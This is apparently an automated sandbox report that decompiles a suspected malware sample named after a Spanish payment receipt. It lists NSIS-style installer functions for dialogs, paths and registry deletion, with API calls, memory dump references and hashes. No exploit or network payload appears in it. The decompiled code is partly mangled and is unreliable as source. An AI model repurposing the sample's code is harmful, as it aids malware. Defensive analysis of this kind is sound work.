                                        • Instruction Fuzzy Hash: 9141D2B4408305EFF324DF24C880A6AB7F8FB843D4B11892DF94687199DB34BA94CB65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E100015FF(struct HINSTANCE__* _a4, short* _a8) {
                                        				_Unknown_base(*)()* _t7;
                                        				void* _t10;
                                        				int _t14;
                                        
                                        				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
                                        				_t10 = GlobalAlloc(0x40, _t14);
                                        				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
                                        				_t7 = GetProcAddress(_a4, _t10);
                                        				GlobalFree(_t10);
                                        				return _t7;
                                        			}






                                        0x10001619
                                        0x10001625
                                        0x10001632
                                        0x10001639
                                        0x10001642
                                        0x1000164e

                                        APIs
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                        • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                        • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                        • GlobalFree.KERNEL32(00000000), ref: 10001642
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2886044792.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                        • Associated: 00000002.00000002.2886017389.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.2886076658.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.2886121541.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_10000000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                        • String ID:
                                        • API String ID: 1148316912-0
                                        • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                        • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                        • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                        • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00401D57() {
                                        				void* _t18;
                                        				struct HINSTANCE__* _t22;
                                        				struct HWND__* _t25;
                                        				void* _t27;
                                        
                                        				_t25 = GetDlgItem( *(_t27 - 8),  *(_t27 - 0x24));
                                        				GetClientRect(_t25, _t27 - 0x58);
                                        				_t18 = SendMessageW(_t25, 0x172, _t22, LoadImageW(_t22, E00402C37(_t22), _t22,  *(_t27 - 0x50) *  *(_t27 - 0x20),  *(_t27 - 0x4c) *  *(_t27 - 0x20), 0x10));
                                        				if(_t18 != _t22) {
                                        					DeleteObject(_t18);
                                        				}
                                        				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t27 - 4));
                                        				return 0;
                                        			}







                                        0x00401d63
                                        0x00401d6a
                                        0x00401d99
                                        0x00401da1
                                        0x00401da8
                                        0x00401da8
                                        0x00402ac2
                                        0x00402ace

                                        APIs
                                        • GetDlgItem.USER32(?,?), ref: 00401D5D
                                        • GetClientRect.USER32(00000000,?), ref: 00401D6A
                                        • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
                                        • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
                                        • DeleteObject.GDI32(00000000), ref: 00401DA8
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                        • String ID:
                                        • API String ID: 1849352358-0
                                        • Opcode ID: 3d379d5cf174b1f3754fd0e8aded0e40a14ad1f56653ff3a87a584377fb567a4
                                        • Instruction ID: d6b80873b4a6bbd9af873cfa92cf23dd081e8a17906ab7f6c0372a94bb23d9f5
                                        • Opcode Fuzzy Hash: 3d379d5cf174b1f3754fd0e8aded0e40a14ad1f56653ff3a87a584377fb567a4
                                        • Instruction Fuzzy Hash: 03F0ECB2604518AFDB41DBE4DE88CEEB7BCEB48341B14446AF641F6191CA789D118B68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 77%
                                        			E00404A7F(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                        				char _v68;
                                        				char _v132;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t23;
                                        				signed int _t24;
                                        				void* _t31;
                                        				void* _t33;
                                        				void* _t34;
                                        				void* _t44;
                                        				signed int _t46;
                                        				signed int _t50;
                                        				signed int _t52;
                                        				signed int _t53;
                                        				signed int _t55;
                                        
                                        				_t23 = _a16;
                                        				_t53 = _a12;
                                        				_t44 = 0xffffffdc;
                                        				if(_t23 == 0) {
                                        					_push(0x14);
                                        					_pop(0);
                                        					_t24 = _t53;
                                        					if(_t53 < 0x100000) {
                                        						_push(0xa);
                                        						_pop(0);
                                        						_t44 = 0xffffffdd;
                                        					}
                                        					if(_t53 < 0x400) {
                                        						_t44 = 0xffffffde;
                                        					}
                                        					if(_t53 < 0xffff3333) {
                                        						_t52 = 0x14;
                                        						asm("cdq");
                                        						_t24 = 1 / _t52 + _t53;
                                        					}
                                        					_t25 = _t24 & 0x00ffffff;
                                        					_t55 = _t24 >> 0;
                                        					_t46 = 0xa;
                                        					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                        				} else {
                                        					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                        					_t50 = 0;
                                        				}
                                        				_t31 = E00406281(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                        				_t33 = E00406281(_t44, _t50, _t55,  &_v132, _t44);
                                        				_t34 = E00406281(_t44, _t50, 0x7a1f20, 0x7a1f20, _a8);
                                        				wsprintfW(_t34 + lstrlenW(0x7a1f20) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                        				return SetDlgItemTextW( *0x7a79f8, _a4, 0x7a1f20);
                                        			}



















                                        0x00404a88
                                        0x00404a8d
                                        0x00404a95
                                        0x00404a96
                                        0x00404aa3
                                        0x00404aab
                                        0x00404aac
                                        0x00404aae
                                        0x00404ab0
                                        0x00404ab2
                                        0x00404ab5
                                        0x00404ab5
                                        0x00404abc
                                        0x00404ac2
                                        0x00404ac2
                                        0x00404ac9
                                        0x00404ad0
                                        0x00404ad3
                                        0x00404ad6
                                        0x00404ad6
                                        0x00404ada
                                        0x00404aea
                                        0x00404aec
                                        0x00404aef
                                        0x00404a98
                                        0x00404a98
                                        0x00404a9f
                                        0x00404a9f
                                        0x00404af7
                                        0x00404b02
                                        0x00404b18
                                        0x00404b29
                                        0x00404b45

                                        APIs
                                        • lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,-007A9000), ref: 00404B20
                                        • wsprintfW.USER32 ref: 00404B29
                                        • SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B3C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: ItemTextlstrlenwsprintf
                                        • String ID: %u.%u%s%s
                                        • API String ID: 3540041739-3551169577
                                        • Opcode ID: e52f1a5f5cfb5a9a0e1921420a7f7e901b35480ee7d38de5188ba9653754f71b
                                        • Instruction ID: e59333b35207274dfa12745fa15a0a2b1e84881af2dc0bba7fa0e94120285970
                                        • Opcode Fuzzy Hash: e52f1a5f5cfb5a9a0e1921420a7f7e901b35480ee7d38de5188ba9653754f71b
                                        • Instruction Fuzzy Hash: AD11EB73A441283BDB00A66D9C45E9E3298DB85374F250237FE26F21D1DD78C82286E8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 59%
                                        			E00401C19(intOrPtr __edx) {
                                        				int _t29;
                                        				long _t30;
                                        				signed int _t32;
                                        				WCHAR* _t35;
                                        				long _t36;
                                        				int _t41;
                                        				signed int _t42;
                                        				int _t46;
                                        				int _t56;
                                        				intOrPtr _t57;
                                        				struct HWND__* _t61;
                                        				void* _t64;
                                        
                                        				_t57 = __edx;
                                        				_t29 = E00402C15(3);
                                        				 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
                                        				 *(_t64 - 0x10) = _t29;
                                        				_t30 = E00402C15(4);
                                        				 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
                                        				 *(_t64 + 8) = _t30;
                                        				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
                                        					 *((intOrPtr*)(__ebp - 0x10)) = E00402C37(0x33);
                                        				}
                                        				__eflags =  *(_t64 - 0x14) & 0x00000002;
                                        				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
                                        					 *(_t64 + 8) = E00402C37(0x44);
                                        				}
                                        				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
                                        				_push("true");
                                        				if(__eflags != 0) {
                                        					_t59 = E00402C37();
                                        					_t32 = E00402C37();
                                        					asm("sbb ecx, ecx");
                                        					asm("sbb eax, eax");
                                        					_t35 =  ~( *_t31) & _t59;
                                        					__eflags = _t35;
                                        					_t36 = FindWindowExW( *(_t64 - 0x10),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                        					goto L10;
                                        				} else {
                                        					_t61 = E00402C15();
                                        					 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
                                        					_t41 = E00402C15(2);
                                        					 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
                                        					_t56 =  *(_t64 - 0x14) >> 2;
                                        					if(__eflags == 0) {
                                        						_t36 = SendMessageW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8));
                                        						L10:
                                        						 *(_t64 - 0x30) = _t36;
                                        					} else {
                                        						_t42 = SendMessageTimeoutW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8), _t46, _t56, _t64 - 0x30);
                                        						asm("sbb eax, eax");
                                        						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                        					}
                                        				}
                                        				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
                                        				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
                                        					_push( *(_t64 - 0x30));
                                        					E004061A6();
                                        				}
                                        				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t64 - 4));
                                        				return 0;
                                        			}















                                        0x00401c19
                                        0x00401c1b
                                        0x00401c22
                                        0x00401c25
                                        0x00401c28
                                        0x00401c32
                                        0x00401c36
                                        0x00401c39
                                        0x00401c42
                                        0x00401c42
                                        0x00401c45
                                        0x00401c49
                                        0x00401c52
                                        0x00401c52
                                        0x00401c55
                                        0x00401c59
                                        0x00401c5b
                                        0x00401cb0
                                        0x00401cb2
                                        0x00401cbd
                                        0x00401cc7
                                        0x00401cca
                                        0x00401cca
                                        0x00401cd3
                                        0x00000000
                                        0x00401c5d
                                        0x00401c64
                                        0x00401c66
                                        0x00401c69
                                        0x00401c6f
                                        0x00401c76
                                        0x00401c79
                                        0x00401ca1
                                        0x00401cd9
                                        0x00401cd9
                                        0x00401c7b
                                        0x00401c89
                                        0x00401c91
                                        0x00401c94
                                        0x00401c94
                                        0x00401c79
                                        0x00401cdc
                                        0x00401cdf
                                        0x00401ce5
                                        0x00402a65
                                        0x00402a65
                                        0x00402ac2
                                        0x00402ace

                                        APIs
                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: MessageSend$Timeout
                                        • String ID: !
                                        • API String ID: 1777923405-2657877971
                                        • Opcode ID: 6465c28e5c943a4eb7eb01deaa6dcd84e082ef29e74d6367337f5043b789c329
                                        • Instruction ID: 77761fc61529e842a28ee3ca09cff7144389c8643cc82091ff338806125a9860
                                        • Opcode Fuzzy Hash: 6465c28e5c943a4eb7eb01deaa6dcd84e082ef29e74d6367337f5043b789c329
                                        • Instruction Fuzzy Hash: 9121C1B1948209AEEF05AFA5CE4AABE7BB4EF84308F14443EF502F61D0D7B84541DB18
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00405BDB(WCHAR* _a4) {
                                        				WCHAR* _t5;
                                        				short* _t7;
                                        				WCHAR* _t10;
                                        				short _t11;
                                        				WCHAR* _t12;
                                        				void* _t14;
                                        
                                        				_t12 = _a4;
                                        				_t10 = CharNextW(_t12);
                                        				_t5 = CharNextW(_t10);
                                        				_t11 =  *_t12;
                                        				if(_t11 == 0 ||  *_t10 != 0x3a || _t10[1] != 0x5c) {
                                        					if(_t11 != 0x5c || _t12[1] != _t11) {
                                        						L10:
                                        						return 0;
                                        					} else {
                                        						_t14 = 2;
                                        						while(1) {
                                        							_t14 = _t14 - 1;
                                        							_t7 = E00405B5D(_t5, 0x5c);
                                        							if( *_t7 == 0) {
                                        								goto L10;
                                        							}
                                        							_t5 = _t7 + 2;
                                        							if(_t14 != 0) {
                                        								continue;
                                        							}
                                        							return _t5;
                                        						}
                                        						goto L10;
                                        					}
                                        				} else {
                                        					return CharNextW(_t5);
                                        				}
                                        			}









                                        0x00405be4
                                        0x00405beb
                                        0x00405bee
                                        0x00405bf0
                                        0x00405bf6
                                        0x00405c0e
                                        0x00405c30
                                        0x00000000
                                        0x00405c16
                                        0x00405c18
                                        0x00405c19
                                        0x00405c1c
                                        0x00405c1d
                                        0x00405c26
                                        0x00000000
                                        0x00000000
                                        0x00405c29
                                        0x00405c2c
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00405c2c
                                        0x00000000
                                        0x00405c19
                                        0x00405c05
                                        0x00000000
                                        0x00405c06

                                        APIs
                                        • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsz62F8.tmp,?,00405C4F,C:\Users\user\AppData\Local\Temp\nsz62F8.tmp,C:\Users\user\AppData\Local\Temp\nsz62F8.tmp,?,?,76583420,0040598D,?,C:\Users\user\AppData\Local\Temp\,76583420,00000000), ref: 00405BE9
                                        • CharNextW.USER32(00000000), ref: 00405BEE
                                        • CharNextW.USER32(00000000), ref: 00405C06
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\nsz62F8.tmp, xrefs: 00405BDC
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: CharNext
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsz62F8.tmp
                                        • API String ID: 3213498283-725846307
                                        • Opcode ID: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
                                        • Instruction ID: 1410c8af8588119ed7c7bec0a33194e6879e2746ee2e5cb83f2c5ed70d44d846
                                        • Opcode Fuzzy Hash: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
                                        • Instruction Fuzzy Hash: 26F09022918B2D95FF3177584C55E7766B8EB55760B00803BE641B72C0D3F85C818EAA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 58%
                                        			E00405B30(WCHAR* _a4) {
                                        				WCHAR* _t9;
                                        
                                        				_t9 = _a4;
                                        				_push( &(_t9[lstrlenW(_t9)]));
                                        				_push(_t9);
                                        				if( *(CharPrevW()) != 0x5c) {
                                        					lstrcatW(_t9, 0x40a014);
                                        				}
                                        				return _t9;
                                        			}




                                        0x00405b31
                                        0x00405b3e
                                        0x00405b3f
                                        0x00405b4a
                                        0x00405b52
                                        0x00405b52
                                        0x00405b5a

                                        APIs
                                        • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040333D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76583420,0040359C,?,00000006,00000008,0000000A), ref: 00405B36
                                        • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040333D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76583420,0040359C,?,00000006,00000008,0000000A), ref: 00405B40
                                        • lstrcatW.KERNEL32(?,0040A014), ref: 00405B52
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B30
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: CharPrevlstrcatlstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 2659869361-3355392842
                                        • Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                        • Instruction ID: 96ba7b99f7925edb235d18d004fc1fe51c5fb87b1b333c4bf7b8a2937e57358f
                                        • Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                        • Instruction Fuzzy Hash: 44D05E21101924AAC1117B448C04EDF72ACAE45344342007AF241B30A1CB78295286FD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 84%
                                        			E00402D2A(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                                        				void* _v8;
                                        				short _v532;
                                        				void* _t19;
                                        				signed int _t26;
                                        				intOrPtr* _t28;
                                        				signed int _t33;
                                        				signed int _t34;
                                        				signed int _t35;
                                        
                                        				_t34 = _a12;
                                        				_t35 = _t34 & 0x00000300;
                                        				_t33 = _t34 & 0x00000001;
                                        				_t19 = E004060CC(__eflags, _a4, _a8, _t35 | 0x00000008,  &_v8);
                                        				if(_t19 == 0) {
                                        					while(RegEnumKeyW(_v8, 0,  &_v532, 0x105) == 0) {
                                        						__eflags = _t33;
                                        						if(__eflags != 0) {
                                        							RegCloseKey(_v8);
                                        							return 1;
                                        						}
                                        						_t26 = E00402D2A(__eflags, _v8,  &_v532, _a12);
                                        						__eflags = _t26;
                                        						if(_t26 != 0) {
                                        							break;
                                        						}
                                        					}
                                        					RegCloseKey(_v8);
                                        					_t28 = E00406639(3);
                                        					if(_t28 == 0) {
                                        						return RegDeleteKeyW(_a4, _a8);
                                        					}
                                        					return  *_t28(_a4, _a8, _t35, 0);
                                        				}
                                        				return _t19;
                                        			}











                                        0x00402d35
                                        0x00402d3e
                                        0x00402d47
                                        0x00402d53
                                        0x00402d5a
                                        0x00402d7e
                                        0x00402d64
                                        0x00402d66
                                        0x00402db9
                                        0x00000000
                                        0x00402dc1
                                        0x00402d75
                                        0x00402d7a
                                        0x00402d7c
                                        0x00000000
                                        0x00000000
                                        0x00402d7c
                                        0x00402d98
                                        0x00402da0
                                        0x00402da7
                                        0x00000000
                                        0x00402dca
                                        0x00000000
                                        0x00402db2
                                        0x00402dd4

                                        APIs
                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D98
                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB9
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
